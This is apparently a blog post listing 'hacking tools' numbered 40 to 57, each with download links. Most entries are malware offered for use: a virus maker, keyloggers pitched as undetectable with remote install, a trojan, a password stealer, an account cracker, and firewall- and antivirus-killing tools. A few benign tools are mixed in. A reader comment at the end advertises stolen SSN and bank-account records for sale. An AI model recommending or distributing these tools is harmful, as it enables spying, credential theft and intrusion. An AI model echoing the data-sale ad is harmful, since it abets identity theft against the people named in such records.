Our software allows you to search the 3.5 Petabytes (yes, that's 3,500,000,000,000,000 bytes!) of files that are stored on RapidShare servers. From now on, whatever file you want to find, you'll get it there.

CODE

http://rapidshare.com/files/83441695/Database-Searcher.rar



40> Virus Maker Tool

USE IT ON YOUR OWN RISK

Education Purpose Only


Download:

CODE

http://rapidshare.com/files/92232964/VB_ViMaker32_RC_03.rar

Password

QUOTE

Password: HANYA UNTUK PENDIDIKAN



41>Turkojan 4.0

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

You can use Turkojan for manage computers,employee monitoring and child monitoring...

http://www.turkojan.com/sayac/click.php?id=10




42> Ardamax Keylogger VERSION 2.85

Ardamax Keylogger - invisible keystroke recorder with remote installation. Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited

CODE

http://rapidshare.com/files/70256706/ardamax.rar



43>Reh Team Keylogger v1.0 -95%UD

Virus Scan Result

CODE

McAfee ----->>> VB-BackDoor.a.gen

http://www.virustotal.com/ro/analisis/e5e985a78b92ead61e9845c861a81f70#

CODE

http://rapidshare.com/files/108559933/Reh_Team_Keylogger_v1.0.rar



44>Rapidshare Password Steal0r

Download:
CODE

http://rapidshare.com/files/114771308/Rapidshare_Password_Steal0r.rar




45>Trojan Remover!!

Trojan Remover aids in the removal of Malware - Trojan Horses, Worms, Adware, Spyware - when standard anti-virus software either fails to detect them or fails to effectively eliminate them. Standard antivirus programs are good at detecting this Malware, but not always so good at effectively removing it.

Trojan Remover is designed specifically to disable/remove Malware without the user having to manually edit system files or the Registry. The program also removes the additional system modifications some Malware carries out which are ignored by standard antivirus and trojan scanners.

http://rapidshare.com/files/109957631/Trojan_Remover_v6.6.9_Build_2525.rar




46>Certified Ethical Hacker Exam Preparation (FULL PACKAGE)

Specialized Solutions EC-Council Training Videos
The Certified Ethical Hacker Training Solution from Specialized Solutions explores the existence and the use of hacking tools and security systems across 21 topical domains. Within each domain, students are presented with several tools that a hacker can use, and which countermeasures are most effective against their use.

Quote:

DISK 1:
http://rapidshare.com/files/51554963...isk1.part1.rarhttp://rapidshare.com/files/51554967...isk1.part2.rar

DISK 2:
http://rapidshare.com/files/51554937...isk2.part1.rarhttp://rapidshare.com/files/51554940...isk2.part2.rar

DISK 3:
http://rapidshare.com/files/51554953...sk3.part01.rarhttp://rapidshare.com/files/51554983...sk3.part02.rarhttp://rapidshare.com/files/51554958...sk3.part03.rar

DISK 4:
http://rapidshare.com/files/51554994...isk4.part1.rarhttp://rapidshare.com/files/51554942...isk4.part2.rar

DISK 5:
http://rapidshare.com/files/51554977...isk5.part1.rarhttp://rapidshare.com/files/51554918...isk5.part2.rar

DISK 6:
http://rapidshare.com/files/51554992...isk6.part1.rarhttp://rapidshare.com/files/51554915...isk6.part2.rar

DISK 7:
http://rapidshare.com/files/51554960...isk7.part1.rarhttp://rapidshare.com/files/51554966...isk7.part2.rar

DISK 8:
http://rapidshare.com/files/51554979...isk8.part1.rarhttp://rapidshare.com/files/51554955...isk8.part2.rar

DISK 9:
http://rapidshare.com/files/51554984...isk9.part1.rarhttp://rapidshare.com/files/51554923...isk9.part2.rar





47> ( E )xploiter

downloadhttp://www.2shared.com/file/3230799/..._XPLOITER.html

Ocx Are Here...
http://www.2shared.com/file/2866856/600806d7/DzOCXShop.html




48> Evil MSN 3.0

PHP Code:

http://www.uploadfile.org./download.php?id=yyP9bifM9hbiSYyXICU7



49> Firewall Killer


http://rapidshare.com/files/10256957...iller.rar.htmlhttp://www.2shared.com/file/3068536/...allkiller.htmlhttp://www.snapdrive.net/qs/4a928186457f

http://www.turboupload.com/download/QyZymwGIp9sz/firewallkiller.rar



50> LAN Attacker

Killing any Computer Pc connection in Your Local Area Network with LanAttacker without a Admin know what happen and other many usefull tools inside it


http://rapidshare.com/files/124404683/LanAttacker.rar




51> Live CD for Wireless Hacking, Used by the FBI

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.


auditor-200605-02-no-ipw2100.iso


This version is for systems with the Intel B/G wireless cards (IPW2200) only. All other system should take the version below.
The md5sum of auditor-200605-02-no-ipw2100.iso is "70a5f3e47c191c055366b3b0a3fa2c90

Code:

http://ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-200605-02-no-ipw2100.iso

ftp://ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-200605-02-no-ipw2100.isohttp://mirror.switch.ch/ftp/mirror/auditor/auditor-200605-02-no-ipw2100.iso

ftp://mirror.switch.ch/mirror/auditor/auditor-200605-02-no-ipw2100.iso

\auditor-200605-02-ipw2100.iso

This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
The md5sum of auditor-200605-02-ipw2100.iso is "cdec4b975c1001ddc127a16a32ed1dd7"

Code:

http://ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-200605-02-ipw2100.iso

ftp://ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-200605-02-ipw2100.iso

http://mirror.switch.ch/ftp/mirror/auditor/auditor-200605-02-ipw2100.iso

ftp://mirror.switch.ch/mirror/auditor/auditor-200605-02-ipw2100.iso



52> MSN Messenger and Hotmail accounts cracker


http://rapidshare.com/files/67541185/MSN_Messenger_Account_Cracker_v2.zip





53> PRIAMOS - powerful SQL Injector & Scanner

You can search SQL Injection vulnerabilities and inject vulnerable string to get all Databases,
Tables and Column datas with injector module.

PRIAMOS is a powerful SQL Injector & Scanner, it allows you to search for SQL Injection vulnerabilities and execute the code injection using vulnerable strings to get all possible Databases, Table and Column data with the PRIAMOS SQL Injection Module.


You can view a demonstration via video here:

http://www.priamos-project.com/demo.htm


Download Here....:-

http://www.priamos-project.com/files/PRIAMOS.v1.0.zip



54> Rocket Port Scanner


http://www.2shared.com/file/3436253/4a03331/RocketPortScanner.html



55>Trojan New 2008 H-Ps Ver:1.0

http://www.2shared.com/file/3329138/bf68fa38/H-PS.html

Password: www.top4u.blogfa.com




56> UltraSurf v8.8 0 - Bypass All Internet Blocking Systems



If you are using browsers other than IE, You have to manually change the proxy settings .
Proxy settings as follows..

HTTP Proxy : 127.0.0.1 Port : 9666


LINK back .

Quote:

http://rapidshare.com/files/94646323...cking.2008.rar



57> xHacker Pro 3.0 -LEAKED- 100% Undetectable


Exterminator: That is a completely new way to totally STOP or UNINSTALL any antivirus or firewall software. Exterminator lets you do the same actions that the uninstaller do. Exterminator currently supports: Disable, Stop, Uninstall services, Terminate Process, Close Window, Delete File, Shell program, extract and run registry entry. Exterminator is a total solution, it currently supports McAfee 2007 and Norton 2006. But you can make your own Exterminator Actions File (XAF) and save them to use anytime, you can even bind XAF files to make a bigger one with support for more AVs and FWs. Exterminator is a really revolution in AV and FW killing methods.



Download :

http://www.zshare.net/download/3998782aaf20f8

url:http://sanjaypatel.weebly.com/hacking-tools.html

3 comments:

godwinseun said...

thanks very much but please update some of the link. i found all i am looking for there

Unknown said...

I am glad I will learn a lot of new stuff right here! thanks you so much.
Crack software download

No Name said...

Hi All!

I'm selling fresh & genuine SSN Leads, with good connectivity. All data is tested & verified.
Headers in Leads:

First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank NAME | DL Number | House Owner

*You can ask for sample before any deal
*Each SSN lead will be cost $1
*Premium Lead will be cost $5
*If anyone wants in bulk I will negotiate
*Sampling is just for serious buyers

Hope for the long term deal
For detailed information please contact me on:

Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040